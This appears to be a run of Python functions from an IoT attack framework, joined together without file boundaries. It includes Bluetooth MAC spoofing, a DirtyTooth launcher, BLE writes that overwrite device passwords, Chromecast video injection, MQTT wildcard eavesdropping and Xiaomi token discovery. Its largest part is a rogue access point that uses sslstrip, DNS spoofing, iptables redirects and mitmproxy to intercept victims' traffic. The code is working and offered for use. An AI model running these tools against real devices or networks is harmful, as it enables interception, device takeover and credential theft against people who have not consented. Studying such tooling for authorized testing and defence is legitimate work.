def run(self): print_info("Searching bluetooth devices to check MAC...") devices = discover_devices(lookup_names=True, lookup_class=True) device_name = None device_class = None for mac, name, cl in devices: if self.args["bmac"] == mac: print_info("A nearby device has been found") device_name = name device_class = hex(cl) break if not device_name: print_info("No nearby device found") if self.args['name']: device_name = self.args['name'] else: print_error("We can't find the name") return if not device_class: if self.args['class']: device_class = self.args['class'] else: print_error("We can't find the profile") return print_info("Trying to change name and MAC") result = system( f"apps/spooftooph -i {self.args['iface']} -a {self.args['bmac']}") if int(result) == 0: print_ok("Done!") print_info("Starting Bluetooth service to allow connections") self._start_service(device_name, device_class) else: print_error("Execution fault...")
def _load_theme(self, theme): theme = colors_terminal.get(theme[0], None) if theme is not None: ColorSelected(theme) print_ok("Theme changed!") else: print_error("Theme not available")
def run(self): # https://stackoverflow.com/questions/49978705/access-ip-camera-in-python-opencv/51166331 try: uri = int(self.args["uri"]) except: uri = self.args["uri"] print_info("Trying to connect...") cam = cv2.VideoCapture(uri) if cam: while (True): try: success, frame = cam.read() if success: print_ok("Connected") print_info("Use q in the frame to close it") # Show frame cv2.imshow('frame', frame) # To close if cv2.waitKey(1) & 0xFF == ord('q'): cv2.destroyAllWindows() break else: print_error("No connection") break except KeyboardInterrupt: break except: pass else: print_error("No connection")
def get_iface(self, interfaces): scanned_aps = [] if len(interfaces) < 1: print_error( 'No wireless interfaces found, bring one up and try again') self.exit = True return None if len(interfaces) == 1: for interface in interfaces: return interface # Find most powerful interface for iface in interfaces: count = 0 proc = Popen(['iwlist', iface, 'scan'], stdout=PIPE, stderr=self.DN) for line in proc.communicate()[0].decode().split('\n'): if ' - Address:' in line: # first line in iwlist scan for a new AP count += 1 scanned_aps.append((count, iface)) print_ok(f'Networks discovered by {iface}: {count}') try: interface = max(scanned_aps)[1] return interface except Exception as e: print_error(f'Minor error: {e}') iface = interfaces[0] print_info(f' Starting monitor mode on {iface}') return iface
def get_mon_mac(self, mon_iface): ''' http://stackoverflow.com/questions/159137/getting-mac-address ''' s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) info = fcntl.ioctl(s.fileno(), 0x8927, mon_iface[:15]) mac = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1] print_ok(f'Monitor mode: {mon_iface} - {mac}') return mac
def run(self): print_info("Launching Service") res = start_dirtytooth(self.args["bmac"], self.args["path"]) if res == 1: print_ok("Done") elif res == 0: print_error( 'Process dirtyagent doesn´t exist (use module launch-service first)' )
def run(self): proc = Popen(f"hciconfig {self.args['iface']} reset".split(" "), stdout=PIPE, stderr=PIPE) data = proc.communicate() if len(data[1]) > 0: print_error(data[1].decode().strip()) else: print_ok(f"{self.args['iface']} has been reset")
def _start_capture(self): bt = BluetoothHCISocket(0) pkts = bt.sniff() total = len(pkts) if not total: print_info("No packets captured") return print_info(f"Writing {total} packets in {self.args['file']}") wrpcap(self.args["file"], pkts) print_ok("Done!")
def start_mon_mode(self, interface): print_ok(f'Starting monitor mode: {interface}') try: os.system('ifconfig %s down' % interface) os.system('iwconfig %s mode monitor' % interface) os.system('ifconfig %s up' % interface) return interface except Exception: print_error('Could not start monitor mode') self.exit = True
def run(self): url = f"http://{self.args['rhost']}/remote/media_control?action=setUri&uri={self.args['uri']}" headers = { 'Content-Type':'application/json', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'close' } response = requests.get(url, headers=headers) if response.status_code == 200: print_ok(f"Done!") else: print_error(f"Response code: {response.status_code}")
def run(self): print_info("Searching services...") bmac = self.args["bmac"] # User input is String (just in case) if str(bmac) == "None": print_info("This process can take time, patience") bmac = None services = find_service(address=bmac) if len(services) > 0: print_ok(f"Found {len(services)} services") print("") self._show_services(services) else: print_info("No services found")
def start(self, to_search): try: file_to_save = open(self.args["file"], "w+") except Exception as e: print_error(e) print_error("Module has not been launched") return data_collected = shodan_search(file_to_save, self.args["apishodan"], to_search) if data_collected: print_ok(f"Saving information in {self.args['file']}") file_to_save.close()
def load_module(path): """Custom function to load a new module Args: path (str): Path fo the module Returns: HomeModule: Module loaded """ print_info('Loading module...') my_path = path.replace("/", ".") my_path = "modules." + my_path module = importlib.import_module(my_path) print_ok('Module loaded!') return module.HomeModule()
def get_mon_iface(self, iface): if iface: if self.check_monitor(iface): self.monitor_on = True return iface monitors, interfaces = self.iwconfig() if len(monitors) > 0: self.monitor_on = True return monitors[0] else: # Start monitor mode on a wireless interface print_ok('Finding the most powerful interface...') interface = self.get_iface(interfaces) monmode = self.start_mon_mode(interface) return monmode
def run(self): dump = Dump() load = Load() reader_v = ["reader", self.args["reader"]] file_v = ["file", self.args["file"]] input("Press any key to dump data from a NFC file") print_info("Setting dump options") dump.set_value(reader_v) dump.set_value(file_v) dump.run() input("Change NFC file and press any key to load the content") print_info("Setting load options") load.set_value(reader_v) load.set_value(file_v) load.run() print_ok("Done!")
def write_data(self, data, uuid): try: characteristics = self.get_characteristics() for ch in characteristics: if ch.uuid == uuid: if self._is_writable(ch.propertiesToString()): print_ok("Good! It's writable!") try: ch.write(data) print_ok("Done!") except: print_error("It has not been written") else: print_error("It is not writable") except: pass
def _subscribe(self): #print_info(f"Trying to subscribe to {self.args['bmac']}") device = self.args["bmac"] data = self._transform_data(self.args["encode"], self.args["data"]) type = self.args["type"] uuid_subscribe = self.args["uuid-subscribe"] uuid_write = self.args["uuid-write"] subs = False try: iface = int(self.args["iface"]) except: iface = 0 print_info(f"\nTrying to subscribe to {device}") ble_device = BLE(device, type, iface) for x in range(0, 6): try: ble_device.connect() print_ok("\nDevice connected...") ble_device.set_delegate(HomeSecurityDelegate) ble_device.set_subscribe(uuid_subscribe) subs = True break except KeyboardInterrupt: print("Module Interrupted") break except: sleep(3) ble_device.write_data(data, uuid_write) if subs: while True: try: if (ble_device.device.waitForNotifications(8.0)): break sleep(3) except KeyboardInterrupt: print("Module Interrupted") return True except: ble_device.disconnect() print("") if subs: print_error(f"Unsubscribed {device}") else: print_error(f"Unable to subscribe to {device}")
def shodan_search(file_to_save, apikey, to_search): data = get_shodan_search_matches(apikey, to_search) if data: print_ok("Data collected!") for entry in data: host = entry['ip_str'] city = entry['location']['city'] country = entry['location']['country_name'] if city: country = city + f"({country})" port = entry['port'] data = f"{host}:{port}" file_to_save.write(f"{data.ljust(20)} - {country}\n") return True else: print_info("No data recollected") return False
def show_tag(self, tag, verbose): print(tag) if (tag.ndef): print_info("NDEF Capabilities:") print_body(f" readable = {self.get_color(tag.ndef.is_readable)}") print_body( f" writeable = {self.get_color(tag.ndef.is_writeable)}") print(f" capacity = {tag.ndef.capacity} byte") print(f" message = {tag.ndef.length} byte") if tag.ndef.length > 0: print_info("NDEF Message:") for i, record in enumerate(tag.ndef.records): print_ok(f"record {i + 1}") print(" type =", repr(record.type)) print(" name =", repr(record.name)) print(" data =", repr(record.data)) if (verbose): print_info("Memory Dump:") print(' ' + '\n '.join(tag.dump()))
def run(self): uuid = "36d25039-5cbc-5ee5-b688-b90fda300d6" bmac = self.args["bmac"] try: iface = int(self.args["iface"]) except: iface = 0 print_info(f"Trying to connect {bmac}") try: p = Peripheral(bmac, "random", iface) print_ok("connected") except KeyboardInterrupt: print_info("Interrupted... exit run") return except: print_error("Failed to connect") return try: ch = p.getCharacteristics(uuid=uuid)[0] if "WRITE" in ch.propertiesToString(): print_ok("Good! It's writable!") else: print_error("It is not writable") return hex_password = bytes.fromhex(self.args['password'].replace( "0x", "")) print_info(f"Updating Password in {bmac}") ch.write(hex_password) print_ok("Done!") except: print_error("It was not possible to write")
def _subscribe(self): #print_info(f"Trying to subscribe to {self.args['bmac']}") bmac = self.args["bmac"] data = self._transform_data(self.args["encode"], self.args["data"]) subs = False conn = 0 try: iface = int(self.args["iface"]) except: iface = 0 print_info(f"\nTrying to subscribe to {bmac}") ble_device = BLE(self.args["bmac"], self.args["type"], iface) while True: wait = False try: ble_device.connect() print_ok("\nDevice connected...") ble_device.write_data(data, self.args["uuid"]) subs = True wait = True ble_device.set_delegate(HomeSecurityDelegate) except KeyboardInterrupt: print("Module Interrupted") break except: sleep(3) conn += 1 if conn == 5: break continue if wait: ble_device.subscribe() print("") if subs: print_error(f"Unsubscribed {self.args['bmac']}") else: print_error(f"Unable to subscribe to {self.args['bmac']}")
def run(self): # thanks to python-miio https://github.com/rytilahti/python-miio try: timeout = int(self.args["timeout"]) except: timeout = 5 addrs = [] # To avoid duplicates if str(self.args["rhost"]) != "None": addr = self.args["rhost"] else: addr = '255.255.255.255' print("Sending packets...") helobytes = bytes.fromhex('21310020ffffffffffffffffffffffffffffffffffffffffffffffffffffffff') s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) s.settimeout(timeout) s.sendto(helobytes, (addr, 54321)) while True: try: data, addr = s.recvfrom(1024) token = "" try: #TODO token = str(data[16:]).replace("b'","").replace("'","").replace("\\x","") except: token = "" if addr[0] not in addrs: print_info(f"Xiaomi Device >> {addr[0]} - Token({token})") addrs.append(addr[0]) except socket.timeout: print_ok("Discovery done") break except Exception as ex: print_error(f"Error while reading discover results: {ex}") break
def output(self, err, monchannel): os.system('clear') if err: print_error(err) else: print_ok(f'{self.mon_iface} channel: {monchannel}\n') if len(self.clients_APs) > 0 and self.show_stations: print( ' ch Client BSSID (ESSID)') # Print the clients list with self.lock: for ca in self.clients_APs: print_info( f"[*] {ca['channel'].ljust(2)} - {ca['client']} ({ca['vendor']}) - {ca['bssid_ap']} ({ca['essid_ap']})" ) if len(self.APs) > 0 and self.show_aps: print('\n Access Points Enc ch ESSID') with self.lock: for ap in self.APs: print( f'[*] {ap["bssid"]} - {ap["encrypted"]} - {ap["ap_channel"].ljust(2)} - {ap["ssid"]}' ) print('')
def run(self): if not self.args["rhost"] and not self.args["name"]: print_info( "Show options, it's necessary to configure onename or rhost") return if str(self.args["timeout"]) == "None": self.args["timeout"] = 6 try: chromecasts = pychromecast.get_chromecasts( timeout=self.args["timeout"]) cast = next(cc for cc in chromecasts if (cc.device.friendly_name == self.args["name"] or cc.host == self.args["rhost"])) cast.wait() print_info("Device found, sending video") except: print_error("Device no found") return yt = YouTubeController() cast.register_handler(yt) yt.play_video(self.args["video"]) print_ok("Done!")
def __on_connect(self, client, userdata, flags, rc): print_ok("Connection successful!")
def __on_connect(self, client, userdata, flags, rc): if str(self.args["verbose"]).lower() == "true" and not self.connected: print_ok("Connection successful!", start="\n", end="\n") client.subscribe("#", qos=1) client.subscribe("$SYS/#") self.connected = True
def test_custom_print_ok(capfdbinary): msg = "Done!" custom_print.print_ok(msg) cap = capfdbinary.readouterr() assert f"[+] {msg}" in cap.out.decode()
def connect(self): self.device = Peripheral(self.bmac, self.type, self.iface) print_ok("connected")
def stop_ap(ap_iface, net_iface, channel, sslstrip_if, hostapd_wpa, driftnet_if, ssid, wireshark_if, tshark_if, dns_if, script_path): try: print_info("Stopping AP") if sslstrip_if: os.system("sudo screen -S mitmap-hostapd -X stuff '^C\n'") os.system("sudo screen -S mitmap-sslstrip -X stuff '^C\n'") os.system("sudo screen -S mitmap-dns2proxy -X stuff '^C\n'") if dns_if: print_info("Restoring old " + script_path + "src/dns2proxy/spoof.cfg...") os.system("sudo mv " + script_path + "src/dns2proxy/spoof.cfg.backup " + script_path + "src/dns2proxy/spoof.cfg") if wireshark_if: os.system("sudo screen -S mitmap-wireshark -X stuff '^C\n'") if driftnet_if: os.system("sudo screen -S mitmap-driftnet -X stuff '^C\n'") if tshark_if: os.system("sudo screen -S mitmap-tshark -X stuff '^C\n'") print_info("Restoring old NetworkManager.cfg") if os.path.isfile("/etc/NetworkManager/NetworkManager.conf.backup"): os.system( "sudo mv /etc/NetworkManager/NetworkManager.conf.backup /etc/NetworkManager/NetworkManager.conf" ) else: os.system("sudo rm /etc/NetworkManager/NetworkManager.conf") print_info("Restarting NetworkManager...") os.system("sudo service network-manager restart") print_info("Stopping DNSMASQ server...") os.system("sudo /etc/init.d/dnsmasq stop > /dev/null 2>&1") os.system("sudo pkill dnsmasq") print_info("Restoring old dnsmasq.cfg...") os.system( "sudo mv /etc/dnsmasq.conf.backup /etc/dnsmasq.conf > /dev/null 2>&1" ) print_info("Deleting old '/etc/dnsmasq.hosts' file...") os.system("sudo rm /etc/dnsmasq.hosts > /dev/null 2>&1") print_info("Flushing iptables rules...") os.system("sudo iptables --flush") os.system("sudo iptables --flush -t nat") os.system("sudo iptables --delete-chain") os.system("sudo iptables --table nat --delete-chain") #print_info("Traffic have been saved to the 'log' folder!") print_ok("mitmAP stopped.") except KeyboardInterrupt: print_info("\n\n[!] Stopping... (Dont worry if you get errors)") try: if sslstrip_if: os.system("sudo screen -S mitmap-hostapd -X stuff '^C\n'") os.system("sudo screen -S mitmap-sslstrip -X stuff '^C\n'") os.system("sudo screen -S mitmap-dns2proxy -X stuff '^C\n'") if dns_if: print_info("Restoring old " + script_path + "src/dns2proxy/spoof.cfg...") os.system("sudo mv " + script_path + "src/dns2proxy/spoof.cfg.backup " + script_path + "src/dns2proxy/spoof.cfg") except: pass try: if wireshark_if: os.system("sudo screen -S mitmap-wireshark -X stuff '^C\n'") except: pass try: if driftnet_if: os.system("sudo screen -S mitmap-driftnet -X stuff '^C\n'") except: pass try: if tshark_if: os.system("sudo screen -S mitmap-tshark -X stuff '^C\n'") except: pass print_info("Restoring old NetworkManager.cfg") if os.path.isfile("/etc/NetworkManager/NetworkManager.conf.backup"): os.system( "sudo mv /etc/NetworkManager/NetworkManager.conf.backup /etc/NetworkManager/NetworkManager.conf > /dev/null 2>&1" ) else: os.system( "sudo rm /etc/NetworkManager/NetworkManager.conf > /dev/null 2>&1" ) print_info("Restarting NetworkManager...") os.system("sudo service network-manager restart") print_info("Stopping DNSMASQ server...") os.system("sudo /etc/init.d/dnsmasq stop > /dev/null 2>&1") os.system("sudo pkill dnsmasq") print_info("Restoring old dnsmasq.cfg...") os.system( "sudo mv /etc/dnsmasq.conf.backup /etc/dnsmasq.conf > /dev/null 2>&1" ) print_info("Deleting old '/etc/dnsmasq.hosts' file...") os.system("sudo rm /etc/dnsmasq.hosts > /dev/null 2>&1") print_info("Flushing iptables rules...") os.system("sudo iptables --flush") os.system("sudo iptables --flush -t nat") os.system("sudo iptables --delete-chain") os.system("sudo iptables --table nat --delete-chain") print("Module stopped.")
def launch_ap(ap_iface, net_iface, channel, sslstrip_if, hostapd_wpa, wpa_passphrase, driftnet_if, ssid, wireshark_if, tshark_if, dns_if, all_dns, proxy_if): sslstrip_if = str(sslstrip_if).lower() == "true" driftnet_if = str(driftnet_if).lower() == "true" wireshark_if = str(wireshark_if).lower() == "true" tshark_if = str(tshark_if).lower() == "true" dns_if = str(dns_if).lower() == "true" hostapd_wpa = str(hostapd_wpa).lower() == "true" try: # Network manager config script_path = network_manager_config(ap_iface) #DNSMASQ CONFIG dnsmasq_config(ap_iface, sslstrip_if) #HOSTAPD CONFIG hotspad_config(ap_iface, ssid, channel, wpa_passphrase, hostapd_wpa) #IPTABLES ip_tables_config(ap_iface, net_iface) #SSLSTRIP MODE if sslstrip_if: #SSLSTRIP DNS SPOOFING if dns_if: print_info("Backing up " + script_path + "src/dns2proxy/spoof.cfg...") os.system("sudo cp " + script_path + "src/dns2proxy/spoof.cfg " + script_path + "src/dns2proxy/spoof.cfg.backup") os.system("sudo cat /dev/null > " + script_path + "src/dns2proxy/spoof.cfg") i = 0 for ssl_dns_line in all_dns["ssl"]: os.system("sudo echo -e '" + ssl_dns_line + "' >> " + script_path + "src/dns2proxy/spoof.cfg") #/SSLSTRIP DNS SPOOFING start_dns_masq() os.system( "sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000" ) os.system( "sudo iptables -t nat -A PREROUTING -p udp --dport 53 -j REDIRECT --to-port 53" ) os.system( "sudo iptables -t nat -A PREROUTING -p tcp --dport 53 -j REDIRECT --to-port 53" ) os.system("sudo sysctl -w net.ipv4.ip_forward=1 > /dev/null 2>&1") print_info("Starting AP on " + ap_iface + " in screen terminal...") os.system("sudo screen -S mitmap-sslstrip -m -d python " + script_path + "src/sslstrip2/sslstrip.py -l 9000 -w " + script_path + "logs/mitmap-sslstrip.log -a") os.system("sudo screen -S mitmap-dns2proxy -m -d sh -c 'cd " + script_path + "src/dns2proxy && python dns2proxy.py'") time.sleep(5) os.system( "sudo screen -S mitmap-hostapd -m -d hostapd /etc/hostapd/hostapd.conf" ) start_services(ap_iface, script_path, wireshark_if, driftnet_if, tshark_if) # print_info("configuring ñapa...") # sniff = Sniffing() # sniff.start_mon_mode(ap_iface) # sleep(1) #print("\nTAIL started on " + script_path + "logs/mitmap-sslstrip.log...\nWait for output... (press 'CTRL + C' 2 times to stop)\nHOST-s, POST requests and COOKIES will be shown.\n") try: time.sleep(5) except: print("") #print_info("Restarting tail in 1 sec... (press 'CTRL + C' again to stop)") print_ok("Done") while True: try: time.sleep(1) #os.system("sudo tail -f " + script_path + "logs/mitmap-sslstrip.log | grep -e 'Sending Request: POST' -e 'New host:' -e 'Sending header: cookie' -e 'POST Data'") except KeyboardInterrupt: raise KeyboardInterrupt #STARTING POINT #/SSLSTRIP MODE else: #DNSMASQ DNS SPOOFING if dns_if: print_info("Backing up /etc/dnsmasq.conf...") os.system("sudo cp /etc/dnsmasq.conf /etc/dnsmasq.conf.backup") for no_ssl_dns_line in all_dns["no_ssl"]: os.system("sudo echo -e '" + ssl_dns_line + "' >> " + script_path + "src/dns2proxy/spoof.cfg") append_file("/etc/dnsmasq.conf", no_ssl_dns_line) else: print_info("Skipping..") #/DNSMASQ DNS SPOOFING start_dns_masq() # #MITMPROXY MODE proxy_if = proxy_if.lower() if proxy_if != "no": if proxy_if == "nossl": os.system( "sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080" ) else: print( "To install the certificate, go to 'http://mitm.it/' through the proxy, and choose your OS." ) os.system( "sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080" ) os.system( "sudo iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8080" ) os.system( "sudo sysctl -w net.ipv4.ip_forward=1 > /dev/null 2>&1") print("Starting AP on " + ap_iface + " in screen terminal...") if wireshark_if == "y" or wireshark_if == "": print("Starting WIRESHARK...") os.system( "sudo screen -S mitmap-wireshark -m -d wireshark -i " + ap_iface + " -k -w " + script_path + "logs/mitmap-wireshark.pcap") if driftnet_if == "y" or driftnet_if == "": print("Starting DRIFTNET...") os.system( "sudo screen -S mitmap-driftnet -m -d driftnet -i " + ap_iface) if tshark_if == "y" or tshark_if == "": print("Starting TSHARK...") os.system("sudo screen -S mitmap-tshark -m -d tshark -i " + ap_iface + " -w " + script_path + "logs/mitmap-tshark.pcap") os.system( "sudo screen -S mitmap-hostapd -m -d hostapd /etc/hostapd/hostapd.conf" ) print( "\nStarting MITMPROXY in 5 seconds... (press q and y to exit)\n" ) try: time.sleep(5) except: print("") os.system("sudo mitmproxy -T --host --follow -w " + script_path + "logs/mitmap-proxy.mitmproxy") #STARTING POINT else: print("Skipping proxy...") # #/MITMPROXY MODE start_services(ap_iface, script_path, wireshark_if, driftnet_if, tshark_if) os.system("sudo sysctl -w net.ipv4.ip_forward=1 > /dev/null 2>&1") print_info("Starting AP on " + ap_iface + "...\n") os.system("sudo hostapd /etc/hostapd/hostapd.conf") print_ok("Done") #STARTING POINT except KeyboardInterrupt: pass except Exception as e: print_error(e) finally: stop_ap(ap_iface, net_iface, channel, sslstrip_if, hostapd_wpa, driftnet_if, ssid, wireshark_if, tshark_if, dns_if, script_path)